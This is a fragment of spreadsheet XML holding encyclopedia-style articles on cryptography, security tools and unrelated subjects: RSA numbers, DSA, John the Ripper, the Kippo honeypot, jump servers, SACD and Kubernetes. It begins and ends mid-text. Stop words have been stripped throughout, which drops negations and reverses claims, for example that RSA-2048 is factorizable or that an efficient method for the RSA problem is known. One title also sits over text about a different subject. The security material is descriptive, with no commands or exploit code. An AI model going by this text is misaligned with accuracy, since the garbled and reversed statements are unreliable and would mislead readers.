4047709603954312447692725276887594590658792939924609261264788572032212334726 8553025718835659126454325220771380103576695555550710440908570895393205649635 76770285413369 rsa-480 rsa-480 decimal digits (1,593 bits), factored far. rsa-480 3026570752950908697397302503155918035891122835769398583955296326343059761445 7144169659817040125185215913853345598217234371231338324773210726853524776378 4105186549246199888070331088462855743520880671299302895546822695492968577380 7067958428022008294111984222973260208233693152589211629901686973933487362360 8129660418514569063995282978176790149760521395548532814196534676974259747930 6858645849268328985687423881853632604706175564461719396117318298679820785491 875674946700413680932103 rsa-490 rsa-490 decimal digits (1,626 bits), factored far. rsa-490 1860239127076846517198369354026076875269515930592839150201028353837031025971 3738522164743327949206433999068225531855072554606782138800841162866037393324 6578171804201717222449954030315293547871401362961501065002486552688663415745 9758925793594165651020789220067311416926076949777767604906107061937873540601 5942747316176193775374190713071154900658503269465516496828568654377183190586 9537640698044932638893492457914750855858980849190488385315076922453755527481 1376719096144119390052199027715691 rsa-500 rsa-500 decimal digits (1,659 bits) factored far. rsa-500 1897194133748626656330534743317202527237183591953428303184581123062450458870 7687605943212347625766427494554764419515427586743205659317254669946604982419 7301601038125215285400688031516401611623963128370629793265939405081077581694 4786041721411024641038040278701109808664214800025560454687625137745393418221 5494821277335671735153472656328448001134940926442438440198910908603252678814 7850601132077287172819942445113232019492229554237898606631074891074722425617 39680319169243814676235712934292299974411361 rsa-617 rsa-617 decimal digits (2,048 bits) factored far. rsa-617 2270180129378501419358040512020458674106123596276658390709402187921517148311 9139894870133091111044901683400949483846818299518041763507948922590774925466 0881718792594659210265970467004498198990968620394600177430944738110569912941 2854289188085536270740767072259373777266697344097736124333639730805176309150 6836310795312607239520365290032105848839507981452307299417185715796297454995 0235053160409198591937180233074148804462179228008317660409386563445710347785 5345712108053073639453592393265186603051504106096643731332367283153932350006 7937107541955437362433248361242525945868802353916766181532375855504886901432 221349733 rsa-2048 rsa-2048 decimal digits (2,048 bits). largest numbers carried largest cash prize factorization, $200,000. rsa-2048 factorizable many years come, unless considerable advances made integer factorization computational power near future. rsa-2048 2519590847565789349402718324004839857142928212620403202777713783604366202070 7595556264018525880784406918290641249515082189298559149176184502808489120072 8449926873928072877767359714183472702618963750149718246911650776133798590957 0009733045974880842840179742910064245869181719511874612151517265463228221686 9987549182422433637259085141865462043576798423387184774447920739934236584823 8242811981638150106748104516603773060562016196762561338441436038339044149526 3443219011465754445417842402092461651572335077870774981712577246796292638635 6373289912154831438167899885040445364023527381951378636564391212010397122822 120720357 also integer factorization records factoring challenge (includes table size status numbers) secret-key challenge notes references factoring challenge administrator (1997-10-12), challenge list. laboratories, challenge numbers (archived internet archive 2006 challenge ended). laboratories, "challenge numbers text format". archived original 2013-05-21. kazumaro aoki, yuji kida, takeshi shimoyama, hiroki ueda, gnfs factoring statistics rsa-100, 110, ..., 150, cryptology eprint archive, report 2004/095, 2004. external links steven levy (march 1996), wisecrackers wired news. coverage rsa-129.</t>
  </si>
  <si>
    <t>Deterministic encryption</t>
  </si>
  <si>
    <t>deterministic encryption scheme opposed probabilistic encryption scheme) cryptosystem always produces ciphertext given plaintext key, even separate executions encryption algorithm. examples deterministic encryption algorithms include cryptosystem (without encryption padding), many block ciphers used mode constant initialization vector. leakage deterministic encryption leak information eavesdropper, recognize known ciphertexts. example, adversary learns given ciphertext corresponds interesting message, learn something every time ciphertext transmitted. gain information meaning various ciphertexts, adversary might perform statistical analysis messages transmitted encrypted channel, attempt correlate ciphertexts observed actions (e.g., noting given ciphertext always received immediately submarine dive). this concern particularly serious case public cryptography, party encrypt chosen messages using public encryption key. case, adversary build large "dictionary" useful plaintext/ciphertext pairs, observe encrypted channel matching ciphertexts. applications while deterministic encryption schemes never semantically secure, advantages probabilistic schemes. database searching encrypted data primary motivation deterministic encryption efficient searching encrypted data. suppose client wants outsource database possibly untrusted database service provider. entry encrypted using public-key cryptosystem, anyone database, distinguished "receiver" private decrypt database entries. however, receiver wants search specific record database, becomes difficult. there public encryption schemes allow keyword search, however schemes require search time linear database size. database entries encrypted deterministic scheme sorted, specific field database could retrieved logarithmic time. security assuming deterministic encryption scheme going used, important understand maximum level security guaranteed. number works focused exact problem. first work rigorously define security deterministic scheme crypto 2007. this work provided fairly strong security definitions (although weaker semantic security), gave constructions random oracle model. follow-up works appeared next year crypto 2008, giving definitional equivalences constructions without random oracles. alternatives deterministic encryption counter problem, cryptographers proposed notion "randomized" probabilistic encryption. under schemes, given plaintext encrypt large possible ciphertexts, chosen randomly encryption process. under sufficiently strong security guarantees attacks proposed become infeasible, adversary unable correlate encryptions message, correlate message ciphertext, even given access public encryption key. this guarantee known semantic security ciphertext indistinguishability, several definitions depending assumed capabilities attacker (see semantic security). also convergent encryption format-preserving encryption searchable symmetric encryption references mihir bellare alexandra boldyreva adam o'neill, deterministic efficiently searchable encryption, crypto 2007 alexandra boldyreva serge fehr adam o'neill, notions security deterministic encryption, efficient constructions without random oracles, crypto 2008 mihir bellare marc fischlin adam o'neill thomas ristenpart, deterministic encryption: definitional equivalences constructions without random oracles, crypto 2008</t>
  </si>
  <si>
    <t>RSA problem</t>
  </si>
  <si>
    <t>cryptography, problem summarizes task performing private-key operation given public key. algorithm raises message exponent, modulo composite number whose factors known. thus, task neatly described finding roots arbitrary number, modulo large sizes excess 1024 bits), efficient method solving problem known; efficient method ever developed, would threaten current eventual security rsa-based cryptosystems—both public-key encryption digital signatures. more specifically, problem efficiently compute given public ciphertext (mod structure public requires large semiprime (i.e., product large prime numbers), coprime φ(n), chosen randomly within range; specify problem complete precision, must also specify generated, depend precise means random keypair generation use. efficient method known solve problem first factoring modulus task believed impractical sufficiently large (see integer factorization). setup routine already turns public exponent prime factorization, private exponent exactly algorithm allows anyone factors obtain private key. decrypted private key. just proofs integer factorization computationally difficult, also proofs problem similarly difficult. method, problem least easy factoring, might well easier. indeed, strong evidence pointing conclusion: method break method cannot converted necessarily method factoring large semiprimes. this perhaps easiest sheer overkill factoring approach: problem asks decrypt arbitrary ciphertext, whereas factoring method reveals private key: thus decrypting arbitrary ciphertexts, also allows perform arbitrary private-key encryptions. along lines, finding decryption exponent indeed computationally equivalent factoring even though problem d.in addition problem, also particular mathematical structure potentially exploited without solving problem directly. achieve full strength problem, rsa-based cryptosystem must also padding scheme like oaep, protect structural problems rsa. also strong assumption factoring challenge rabin cryptosystem, whose equivalency factoring known references further reading breaking difficult factoring, brown, 2005. this unrefereed preprint purports solving problem using straight line program difficult factoring provided small factor. breaking generically equivalent factoring, aggarwal maurer, 2008. this eurocrypt 2009 paper (link preprint version) proves solving problem using generic ring algorithm difficult factoring. when e-th roots become easier than factoring, antoine joux, david naccache emmanuel thomé, 2007. this asiacrypt 2007 paper (link preprint version) proves solving problem using oracle certain special cases problem easier factoring.</t>
  </si>
  <si>
    <t>Demo (computer programming)</t>
  </si>
  <si>
    <t>Digital Signature Algorithm</t>
  </si>
  <si>
    <t>digital signature algorithm (dsa) federal information processing standard digital signatures, based mathematical concept modular exponentiation discrete logarithm problem. variant schnorr elgamal signature schemes.: national institute standards technology (nist) proposed digital signature standard (dss) 1991, adopted fips 1994. four revisions initial specification released. newest specification fips 186-4 july 2013. patented nist made patent available worldwide royalty-free. draft version specification fips 186-5 indicates longer approved digital signature generation, used verify signatures generated prior implementation date standard. overview works framework public-key cryptosystems based algebraic properties modular exponentiation, together discrete logarithm problem, considered computationally intractable. algorithm uses pair consisting public private key. private used generate digital signature message, signature verified using signer's corresponding public key. digital signature provides message authentication (the receiver verify origin message), integrity (the receiver verify message modified since signed) non-repudiation (the sender cannot falsely claim signed message). history 1982, government solicited proposals public signature standard. august 1991 national institute standards technology (nist) proposed digital signature standard (dss). initially significant criticism, especially software companies already invested effort developing digital signature software based cryptosystem.: nevertheless, nist adopted federal standard (fips 186) 1994. four revisions initial specification released: fips 186–1 1998, fips 186–2 2000, fips 186–3 2009, fips 186–4 2013. draft version standard fips 186-5 forbids signing dsa, allowing verification signatures generated prior implementation date standard document. replaced newer signature schemes eddsa.dsa covered u.s. patent 5,231,668, filed july 1991 expired, attributed david kravitz, former employee. this patent given "the united states america represented secretary commerce, washington, d.c.", nist made patent available worldwide royalty-free. claus schnorr claims u.s. patent 4,995,082 (also expired) covered dsa; claim disputed. operation algorithm involves four operations: generation (which creates pair), distribution, signing signature verification. generation generation phases. first phase choice algorithm parameters shared different users system, second phase computes single pair user. parameter generation choose approved cryptographic hash function {\displaystyle output length {\displaystyle |h|} bits. original dss, {\displaystyle always sha-1, stronger sha-2 hash functions approved current dss. {\displaystyle |h|} greater modulus length {\displaystyle leftmost {\displaystyle bits hash output used. choose length {\displaystyle original constrained {\displaystyle multiple 1024 inclusive. nist 800-57 recommends lengths 2048 3072) keys security lifetimes extending beyond 2010 2030). choose modulus length {\displaystyle {\displaystyle n&lt;l} {\displaystyle n\leq |h|} fips 186-4 specifies {\displaystyle {\displaystyle values: (1024, 160), (2048, 224), (2048, 256), (3072, 256). choose {\displaystyle -bit prime {\displaystyle choose {\displaystyle -bit prime {\displaystyle {\displaystyle p-1} multiple {\displaystyle choose integer {\displaystyle randomly {\displaystyle \{2\ldots p-2\}} compute {\displaystyle g:=h^{(p-1)/q}\mod rare case {\displaystyle g=1} different {\displaystyle commonly {\displaystyle h=2} used. this modular exponentiation computed efficiently even values large.the algorithm parameters {\displaystyle {\displaystyle {\displaystyle these shared different users system. per-user keys given parameters, second phase computes pair single user: choose integer {\displaystyle randomly {\displaystyle \{1\ldots q-1\}} compute {\displaystyle y:=g^{x}\mod {\displaystyle private {\displaystyle public key. distribution signer publish public {\displaystyle that send receiver reliable, necessarily secret, mechanism. signer keep private {\displaystyle secret. signing message {\displaystyle signed follows: choose integer {\displaystyle randomly {\displaystyle \{1\ldots q-1\}} compute {\displaystyle r:=\left(g^{k}{\bmod {\,}}p\right){\bmod {\,}}q} unlikely case {\displaystyle r=0} start different random {\displaystyle compute {\displaystyle s:=\left(k^{-1}\left(h(m)+xr\right)\right){\bmod {\,}}q} unlikely case {\displaystyle s=0} start different random {\displaystyle .the signature {\displaystyle \left(r,s\right)} calculation {\displaystyle {\displaystyle amounts creating per-message key. modular exponentiation computing {\displaystyle computationally expensive part signing operation, computed message known. calculating modular inverse {\displaystyle k^{-1}{\bmod {\,}}q} second expensive part, also computed message known. computed using extended euclidean algorithm using fermat's little theorem {\displaystyle k^{q-2}{\bmod {\,}}q} signature verification verify signature {\displaystyle \left(r,s\right)} valid signature message {\displaystyle follows: verify {\displaystyle 0&lt;r&lt;q} {\displaystyle 0&lt;s&lt;q} compute {\displaystyle w:=s^{-1}{\bmod {\,}}q} compute {\displaystyle u_{1}:=h(m)\cdot w\,{\bmod {\,}}q} compute {\displaystyle u_{2}:=r\cdot w\,{\bmod {\,}}q} compute {\displaystyle v:=\left(g^{u_{1}}y^{u_{2}}{\bmod {\,}}p\right){\bmod {\,}}q} signature valid {\displaystyle v=r} correctness algorithm signature scheme correct sense verifier always accept genuine signatures. this shown follows: first, since {\textstyle g=h^{(p-1)/q}~{\text{mod}}~p} follows {\textstyle g^{q}\equiv h^{p-1}\equiv 1\mod fermat's little theorem. since {\displaystyle g&gt;0} {\displaystyle prime, {\displaystyle must order {\displaystyle signer computes {\displaystyle s=k^{-1}(h(m)+xr){\bmod {\,}}q} thus {\displaystyle {\begin{aligned}k&amp;\equiv h(m)s^{-1}+xrs^{-1}\\&amp;\equiv h(m)w+xrw{\pmod {q}}\end{aligned}}} since {\displaystyle order {\displaystyle {\displaystyle {\begin{aligned}g^{k}&amp;\equiv g^{h(m)w}g^{xrw}\\&amp;\equiv g^{h(m)w}y^{rw}\\&amp;\equiv g^{u_{1}}y^{u_{2}}{\pmod {p}}\end{aligned}}} finally, correctness follows {\displaystyle {\begin{aligned}r&amp;=(g^{k}{\bmod {\,}}p){\bmod {\,}}q\\&amp;=(g^{u_{1}}y^{u_{2}}{\bmod {\,}}p){\bmod {\,}}q\\&amp;=v\end{aligned}}} sensitivity with dsa, entropy, secrecy, uniqueness random signature value {\displaystyle critical. critical violating three requirements reveal entire private attacker. using value twice (even keeping {\displaystyle secret), using predictable value, leaking even bits {\displaystyle several signatures, enough reveal private {\displaystyle .this issue affects ecdsa december 2010, group calling fail0verflow announced recovery ecdsa private used sony sign software playstation game console. attack made possible sony failed generate random {\displaystyle signature.this issue prevented deriving {\displaystyle deterministically private message hash, described 6979. this ensures {\displaystyle different {\displaystyle h(m)} unpredictable attackers know private {\displaystyle addition, malicious implementations ecdsa created {\displaystyle chosen order subliminally leak information signatures. example, offline private could leaked perfect offline device released innocent-looking signatures. implementations below list cryptographic libraries provide support dsa: botan bouncy castle cryptlib crypto++ libgcrypt nettle openssl wolfcrypt gnutls also modular arithmetic (cryptosystem) ecdsa references external links fips 186-4: digital signature standard (dss), fourth (and current) revision official specification. recommendation management part general, nist special publication 800-57, 62–63</t>
  </si>
  <si>
    <t>Delsarte–Goethals code</t>
  </si>
  <si>
    <t>delsarte–goethals code type error-correcting code. history concept introduced mathematicians delsarte j.-m. goethals published paper.a proof properties delsarte–goethals code published 1970. function delsarte–goethals code dg(m,r) even binary, non-linear code length {\displaystyle 2^{m}} size {\displaystyle 2^{r(m-1)+2m}} minimum distance {\displaystyle 2^{m-1}-2^{m/2-1+r}} code sits kerdock code second-order reed–muller codes. more precisely, {\displaystyle k(m)\subseteq dg(m,r)\subseteq rm(2,m)} when dg(m,r) k(m) dg(m,r) rm(2,m). delsarte–goethals code strength therefore orthogonal array {\displaystyle 2^{3m-1},2^{m},\mathbb _{2},7)} references</t>
  </si>
  <si>
    <t>Incident Object Description Exchange Format</t>
  </si>
  <si>
    <t>used computer security, iodef (incident object description exchange format) data format used describe computer security information purpose exchange computer security incident response teams (csirts). iodef messages organized human-readable way, machine format. details format described 5070 updated 6685. version format defined 7970, supersedes previous version. this presents implementation data model well associated dtd. further implementation guidance iodef defined 8274. main characteristics iodef compatibility idmef intrusion detection message exchange format developed intrusion detection systems. reason, iodef heavily based idmef provides backward compatibility format iodef object-oriented structured format, composed classes first version. iodef idmef formats common: field structure similar idmef extensible format: addition usual additional data class, allow adding information relevant iodef message, enumerations provided "ext" field. this field used none proposed choices fitting. here list main fields: incidentid one. incident identification number assigned incident csirt creates iodef document. alternativeid zero one. incidents numbers used csirts refer incident described document. relatedactivity zero one. numbers incidents linked described document. detecttime zero one. time incident detected first time. starttime zero one. time incident started. endtime zero one. time incident ended. reporttime one. time incident reported. description zero more. ml_string. non-formatted textual description event. assessment more. characterization incident impact. method zero more. techniques used intruder incident. contact more. contact information groups involved incident. eventdata zero more. description events involving incident. history zero more. log, events notable actions took place incident management. additionaldata zero more. mechanism extends data model. software using iodef prelude siem iodeflib python library create, parse edit cyber incident reports using iodef format (rfc 5070) rt-iodef perl module translating tickets iodef messages also maps iodef rt’s custom fields based description mantis iodef importer iodef (v1.0) importer mantis cyber threat intelligence mgmt. framework arcsight-iodef-perl perl module convert arcsight standardized iodef message iodef implementations iodef iodef this library maps iodef (rfc 5070) google protocol buffer serialization library. iodef perl module easily creating/parsing iodef documents stix output formatter iodef::pb::simple library parsing iodef external links 5070 incident object description exchange format (iodef) 6685 expert review incident object description exchange format (iodef) extensions iana registry 7203 incident object description exchange format (iodef) extension structured cybersecurity information 7970 incident object description exchange format version 8274 incident object description exchange format usage guidance secef, project promote idmef iodef formats</t>
  </si>
  <si>
    <t>Robot Monk Xian'er</t>
  </si>
  <si>
    <t>robot monk xian'er (chinese: 贤二机器僧) humanoid robot based cartoon character xian'er. developed team monks, volunteers experts beijing longquan monastery beijing, china. follow human instructions make body movements, read scriptures play buddhist music. chat respond people's emotional spiritual questions buddhist wisdom. chatbot, robot monk xian'er available certain public platforms including wechat facebook. over years, master xuecheng, abbot beijing longquan monastery, replied thousands questions sina weibo. these questions answers become data source chatbot. references external links robot monk xian’er facebook page</t>
  </si>
  <si>
    <t>secur, oper, window, softwar, data, attack, virtual, user, version, devic</t>
  </si>
  <si>
    <t>John the Ripper</t>
  </si>
  <si>
    <t>john ripper free password cracking software tool. originally developed unix operating system, fifteen different platforms (eleven architecture-specific versions unix, dos, win32, beos, openvms). among frequently used password testing breaking programs combines number password crackers package, autodetects password hash types, includes customizable cracker. various encrypted password formats including several crypt password hash types commonly found various unix versions (based des, md5, blowfish), kerberos afs, windows nt/2000/xp/2003 hash. additional modules extended ability include md4-based password hashes passwords stored ldap, mysql, others. sample output here sample output debian environment. first line command expand data stored file "pass.txt". next line contents file, i.e. user (azl) hash associated user (zwwxih15q). third line command running john ripper utilizing "-w" flag. "password.lst" name text file full words program hash, pass.txt makes another appearance file want john work then output john working. loaded password hash "cat" command type hash john thinks (traditional des). also attempt required guess time 100% guess rate. attack types modes john dictionary attack. takes text string samples (usually file, called wordlist, containing words found dictionary real passwords cracked before), encrypting format password examined (including encryption algorithm key), comparing output encrypted string. also perform variety alterations dictionary words these. many alterations also used john's single attack mode, modifies associated plaintext (such username encrypted password) checks variations hashes. john also offers brute force mode. type attack, program goes possible plaintexts, hashing comparing input hash. john uses character frequency tables plaintexts containing frequently used characters first. this method useful cracking passwords appear dictionary wordlists, takes long time run. also brute-force search brute-force attack crack (password software) computer hacking hacking tool openwall project password cracking references external links official website</t>
  </si>
  <si>
    <t>Kippo</t>
  </si>
  <si>
    <t>kippo medium-interaction honeypot written python. kippo used brute force attacks entire shell interaction performed attacker. inspired kojoney. source code released license. kippo longer active development recommends using fork'd project cowrie. python dependencies python twisted twisted conch python 2.5+ less python-dev pysan1 python-openssl pycrypto mysql python references external links kippo github kippo (old homepage) googlecode cowrie active kippo fork github kojoney honeypot service</t>
  </si>
  <si>
    <t>Jump server</t>
  </si>
  <si>
    <t>jump server, jump host jump system network used access manage devices separate security zone. jump server hardened monitored device spans dissimilar security zones provides controlled means access them. common example managing host trusted networks computers. background 1990s co-location facilities became common need provide access dissimilar security zones. jump server concept emerged meet need. jump server would span networks typically used conjunction proxy service socks provide access administrative desktop managed device. ssh-based tunneling became common, jump servers became facto method access. implementation jump servers often placed secure zone provide transparent management devices management session established. jump server acts single audit point traffic also single place user accounts managed. prospective administrator must jump server order gain access assets access logged later audit. unix typical configuration hardened unix unix-like) machine configured local firewall. administrator connects target machine making connection administrator's personal computer jump server using forwarding access target machine. using tunnel target host allows insecure protocols manage servers without creating special firewall rules exposing traffic inside network. windows typical configuration windows server running remote desktop services administrators connect isolates secure infrastructure configuration administrator's workstation. security risks jump server potential risk network's design. there several ways improving security jump server, including: properly subnetting segmenting network, securing vlans using firewall router. using higher security authentication, multi-factor authentication. keeping operating system software jump server date. using acls restrict access. allowing outbound access rest internet jump server. restricting programs jump server. enabling strong logging monitoring alerting suspicious activity.with high level risk jump server represent, suitable higher security replacement.in 2015, compromised jump server allowed attackers access 21.5 million records largest breaches government data history united states. also bastion host proxy server references external links wimmer, peter kai. "secure network zones" (pdf). atsec information security. archived original (pdf) 2016-03-08. mathis, roland (2004-09-20). "installation secure user-chrooted jumphost" (pdf). giac. retrieved 2019-06-12.</t>
  </si>
  <si>
    <t>Ladder-DES</t>
  </si>
  <si>
    <t>cryptography, ladder-des block cipher designed 1994 terry ritter. 4-round feistel cipher block size bits, using round function. actual schedule, total size 4×56=224 bits. 1997, biham found forms cryptanalysis ladder-des depend birthday paradox; deduced presence absence collisions, plaintexts give equal intermediate values encryption process. presented chosen-plaintext attack known-plaintext attack; uses plaintexts work, known-plaintext attack requires much memory. references terry ritter february 1994). "ladder des". newsgroup: sci.crypt. usenet: 1994feb22.083353.26012@cactus.org. retrieved january 2007. biham (1997). cryptanalysis ladder-des (pdf). international workshop fast software encryption (fse '97). haifa: springer-verlag. 134–138. retrieved january 2007.</t>
  </si>
  <si>
    <t>Private Disk</t>
  </si>
  <si>
    <t>private disk disk encryption application microsoft windows operating system, developed dekart srl. works creating virtual drive, contents encrypted on-the-fly; software drive usual one. private disk's selling points ease use, achieved hiding complexity user (e.g. data wiping applied transparently encrypted image deleted.) this simplicity however reduce flexibility respects (e.g. allows aes-256 encryption.) although private disk uses nist certified implementation sha-256/384/512 algorithms, certification restricted single component private disk; encryption/hash library used private disk complete system. feature highlights nist-certified implementation aes-256-bit, sha-2. private disk complies fips fips 180-2 mode secret used encrypt sectors storage volume disk firewall, application-level filter, allows trusted programs access virtual drive ability directly removable drive, requiring local installation offers access encrypted data system, even administrative privileges available encrypted images accessed windows mobile windows handhelds; achieved making encrypted container format compatible containers used secubox (disk encryption software aiko solutions) file wiping applied deleting encrypted image file move, file migration tool, locate specified files system securely move encrypted disk compatibility windows windows operating systems autorun autofinish automatically start program script virtual disk mounted dismounted encrypted backup encrypted image password quality meter automatic backup disk's encryption built-in password recovery tool compatibility 64-bit platformsexisting versions there multiple versions private disk, provide different feature set: private disk hard disk encryption software uses 256-bit encryption, highly configurable, offers application-level protection, disk portability, etc. private disk multifactor superset private disk, providing functionality, adding support biometric authentication, well smart-card token-based authentication. private disk light free version, uses aes-128 comes restricted features. private disk software development used build custom application provides data encryption facilities. also disk encryption software comparison disk encryption software external links dekart company web-page information certified implementations cryptographic algorithms private disk discussion forum release notes latest version references</t>
  </si>
  <si>
    <t>Pit Signal Processing</t>
  </si>
  <si>
    <t>super audio (sacd) optical disc format audio storage introduced 1999. developed jointly sony philips electronics intended successor compact disc (cd) format. sacd format allows multiple audio channels (i.e. surround sound multichannel sound). also provides higher rate longer playing time conventional sacd designed played sacd player. hybrid sacd contains compact disc digital audio (cdda) layer also played standard player. history super audio format introduced 1999, defined scarlet book standard document. philips crest digital partnered 2002 develop install first sacd hybrid disc production line united states, production capacity three million discs year. sacd achieve level growth compact discs enjoyed 1980s, accepted mainstream market.by 2007, sacd failed make significant impact marketplace; consumers increasingly downloading low-resolution music files internet rather buying music physical disc formats. small niche market sacd remained, serving audiophile community. content october 2009, record companies published 6,000 sacd releases, slightly half classical music. jazz popular music albums, mainly remastered previous releases, next genres represented.many popular artists released back catalog sacd. pink floyd's album dark side moon (1973) sold 800,000 copies june 2004 sacd surround sound edition. who's rock opera tommy (1969), roxy music's avalon (1982), released sacd take advantage format's multi-channel capability. three albums remixed surround, released hybrid sacds stereo standard layer. some popular artists released recordings sacd. sales figures sting's sacred love (2003) album reached number sacd sales charts four european countries june 2004.between 2007 2008, rock band genesis re-released studio albums across three sacd sets. each album sets contains stereo mixes. original stereo mixes included. canada versions sacd instead. august 2009 labels released sacds. instead depending major label support, orchestras artists released sacds own. instance, chicago symphony orchestra started chicago resound label provide full burgeoning support high-resolution sacd hybrid discs, london symphony orchestra established live label.many sacd discs released 2000-2005 print available used market. 2009, major record companies longer regularly releasing discs format, releases confined smaller labels. technology sacd discs identical physical dimensions standard compact discs. areal density disc dvd. there three types disc: hybrid: hybrid sacds sacd layer (the layer), well (red book) audio layer readable conventional compact disc players. single-layer: disc sacd layer. dual-layer: disc sacd layers, totaling layer. dual-layer sacds store nearly twice much data single-layer sacd. like dual-layer dvds, data spiral first layer encoded inside out, second layer encoded starting point first layer ends ending innermost part disc. unlike hybrid discs, single- dual-layer sacds incompatible conventional players cannot played them.a stereo sacd recording uncompressed rate mbit/s, four times rate book stereo audio.commercial releases commonly include surround sound (five full-range plus multi-channel) stereo (dual-channel) mixes sacd layer. some reissues retain mixes earlier multi-channel formats (examples include 1973 quadraphonic mike oldfield's tubular bells 1957 three-channel stereo recording chicago symphony orchestra mussorgsky's pictures exhibition, reissued sacd 2001 2004 respectively). disc reading objective lenses conventional players longer working distance, focal length, lenses designed sacd players. sacd-capable dvd, blu-ray ultra blu-ray players, laser used reading sacds. this means hybrid sacd placed conventional player, infrared laser beam passes sacd layer reflected layer standard distance, sacd layer focus. when disc placed sacd player, laser reflected sacd layer distance) reach layer. conversely, conventional placed sacd player, laser read disc since sacd layer. direct stream digital sacd audio stored direct stream digital (dsd) format using pulse-density modulation (pdm) audio amplitude determined varying proportion this contrasts compact disc conventional computer audio systems using pulse-code modulation (pcm) audio amplitude determined numbers encoded stream. both modulations require neighboring samples reconstruct original waveform, lower frequency encoded. 1-bit, sampling rate 2.8224 mhz, makes noise shaping quantization techniques order push 1-bit quantization noise inaudible ultrasonic frequencies. this gives format greater dynamic range wider frequency response sacd format capable delivering dynamic range extended frequency response khz, although available players list upper limit 70–90 khz, practical limits reduce khz. because nature sigma-delta converters, cannot directly compared. dsd's frequency response high khz, frequencies high compete high levels ultrasonic quantization noise. with appropriate low-pass filtering, frequency response achieved along dynamic range nearly dynamic range audio resolution bits. direct stream transfer reduce space bandwidth requirements dsd, lossless data compression method called direct stream transfer (dst) used. compression compulsory multi-channel regions optional stereo regions. typically compresses factor three, allowing disc contain minutes 2-channel 5.1-channel sound.direct stream transfer compression standardized amendment mpeg-4 audio standard, iso/iec 14496-3:2001/amd 6:2005 (lossless coding oversampled audio), 2005. contains definitions described super audio specification. mpeg-4 provides lossless coding oversampled audio signals. target applications archiving storage 1-bit oversampled audio signals sa-cd.a reference implementation mpeg-4 published iso/iec 14496-5:2001/amd.10:2007 2007. copy protection sacd several copy protection features physical level, made digital content sacd discs difficult copy jailbreak playstation content copyable without sacd quality resorting analog hole, ripping conventional layer hybrid discs. copy protection schemes include physical modulation 80-bit encryption audio data, encoded special area disc readable licensed sacd device. layer sacd disc cannot played back computer cd/dvd drives, sacds manufactured disc replication facilities shizuoka salzburg. nonetheless, playstation sacd drive appropriate firmware specialized software extract copy stream. sound quality sound quality parameters achievable book cd-da sacd formats compared limits human hearing follows: dynamic range: (with shaped dither); frequency range: hz—20 sacd dynamic range: frequency range: human hearing dynamic range: frequency range: hz—20 (young person); hz—8-15 (middle-aged adult)in september 2007, audio engineering society published results year-long trial, range subjects including professional recording engineers asked discern difference high-resolution audio sources (including sacd dvd-audio) compact disc audio (44.1 khz/16 bit) conversion source material double-blind test conditions. trials, correct answers, 49.8% success rate corresponding almost exactly would expected chance guessing alone. when level signal elevated more, test subjects able detect higher noise floor cd-quality loop easily. authors commented: now, difficult negative results prove inaudibility given phenomenon process. there always remote possibility different system finely attuned pair ears would reveal difference. gathered enough data, using sufficiently varied capable systems listeners, state burden proof shifted. further claims careful 16/44.1 encoding audibly degrades high resolution signals must supported properly controlled double-blind tests. following criticism original published results study sufficiently detailed, published list audio equipment recordings used tests. since meyer-moran study 2007, approximately studies published high-resolution audio, half included blind tests. joshua reiss performed meta-analysis published tests included sufficient experimental detail data. paper published july 2016 issue journal, reiss says that, although individual tests mixed results, effect "small difficult detect," overall result trained listeners could distinguish hi-resolution recordings equivalents blind conditions: "overall, small statistically significant ability discriminate standard quality audio (44.1 khz, bit) high-resolution audio (beyond standard quality). when subjects trained, ability discriminate significant." hiroshi nittono pointed results reiss's paper showed ability distinguish high-resolution audio cd-quality audio "only slightly better chance."contradictory results found comparing high-resolution formats. double-blind listening tests 2004 24-bit, 176.4 recordings reported among test subjects significant differences could heard. advocates equipment manufacturers continue assert improvement sound quality 24-bit 176.4 khz. 2003 study found despite formats' extended frequency responses, people could distinguish audio information audio without high-frequency content. 2014 study, however, marui found double-blind conditions, listeners able distinguish (192 khz/24 bits) (2.8 mhz) (5.6mhz) recording formats, preferring qualitative features dsd, could discriminate formats. playback hardware sony scd-1 player introduced concurrently sacd format 1999, price approximately us$5,000. weighed kilograms played two-channel sacds book only. electronics manufacturers, including onkyo, denon, marantz, pioneer yamaha offer offered sacd players. sony made in-car sacd players.sacd players permitted offer output carrying unencrypted stream dsd.the first generations sony's playstation game console capable reading sacd discs. starting third generation (introduced october 2007), sacd playback removed. playstation models, however, play disc format. playstation capable converting multi-channel lossy mbit/s playback s/pdif using 2.00 system software. subsequent revision removed feature.several brands introduced (mostly high-end) blu-ray disc ultra blu-ray players play sacd discs.unofficial playback sacd disc images possible freeware audio player foobar2000 windows using open source plug-in extension called sacddecoder. macos music software audirvana also supports playback sacd disc images. also high-resolution audio audio format audio storage dsd-cd dualdisc dvd-audio extended resolution compact disc (xrcd) high definition compatible digital (hdcd) references bibliography janssen, reefman, "super-audio introduction". signal processing magazine, ieee volume issue july 2003, 83–90. external links super audio compact disc: technical proposal, sony (archived pdf) sa-cd.net reviews sacd releases discussion forum.</t>
  </si>
  <si>
    <t>Kubernetes</t>
  </si>
  <si>
    <t>kubernetes commonly stylized k8s) open-source container orchestration system automating software deployment, scaling, management. google originally designed kubernetes, cloud native computing foundation maintains project. kubernetes works docker, containerd, cri-o. originally, interfaced exclusively docker runtime "dockershim"; however, 2016 april 2022, kubernetes deprecated shim favor directly interfacing container containerd, replacing docker runtime compliant container runtime interface (cri). with release v1.24 2022, "dockershim" removed entirely.amazon, google, ibm, microsoft, oracle, hat, suse, platform9 vmware offer kubernetes-based platforms infrastructure service (iaas) deploy kubernetes. history kubernetes (κυβερνήτης, greek "helmsman," "pilot," "governor", etymological root cybernetics) announced google mid-2014. project created beda, brendan burns, craig mcluckie, soon joined google engineers, including brian grant hockin.the design development kubernetes influenced google's borg cluster manager. many contributors previously worked borg; codenamed kubernetes "project star trek ex-borg character seven nine gave logo seven-spoked wheel. unlike borg, written c++, kubernetes source code language. kubernetes released july 2015. google worked linux foundation form cloud native computing foundation (cncf) offer kubernetes seed technology. february 2016, helm package manager kubernetes released. cool 2017, kubernetes container orchestration amid fierce competition. google already offering managed kubernetes services, supporting kubernetes part openshift since inception kubernetes project 2014. year 2017, principal competitors ralied around kubernetes announced adding native support august, vmware (proponent pivotal cloud foundry) september, mesosphere, inc. (proponent marathon mesos) october, docker, inc. (proponent docker) later october, microsoft azure november, announced support kubernetes elastic container service kubernetes (eks)on march 2018, kubernetes project reached ninth place list github projects number commits, second place authors issues, linux kernel.until version 1.18, kubernetes followed support policy, meaning three recent minor versions receive security updates fixes. starting version 1.19, kubernetes follows support policy. concepts kubernetes defines building blocks ("primitives") collectively provide mechanisms deploy, maintain, scale applications based cpu, memory custom metrics. kubernetes 